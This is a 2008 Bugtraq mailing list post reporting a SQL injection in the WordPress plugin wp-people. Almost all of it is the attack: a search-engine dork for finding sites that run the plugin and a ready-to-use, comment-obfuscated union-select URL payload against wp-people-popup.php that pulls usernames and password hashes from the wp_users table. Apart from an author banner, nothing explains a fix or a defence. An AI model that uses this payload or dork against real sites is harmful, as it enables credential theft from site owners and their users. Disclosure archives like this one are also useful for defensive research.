Bugtraq mailing list archives
Wordpress Plugin (wp-people) SQL Injection
From: hackturkiye.hackturkiye () gmail com
Date: 16 Feb 2008 16:52:09 -0000
######################################################################### # # Wordpress Plugin (wp-people) SQL Injection # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com/ # ######################################################################### # # DORKS 1 : allinurl :"allinurl: "wp-people"" # ########################################################################## EXPLOIT : wp-content/plugins/wp-people/wp-people-popup.php?person=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cuser_pass%2Cuser_login%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users ########################################################################## # S@BUN GOOD LUCKY S@BUN ##########################################################################
Current thread:
- Wordpress Plugin (wp-people) SQL Injection hackturkiye . hackturkiye (Feb 18)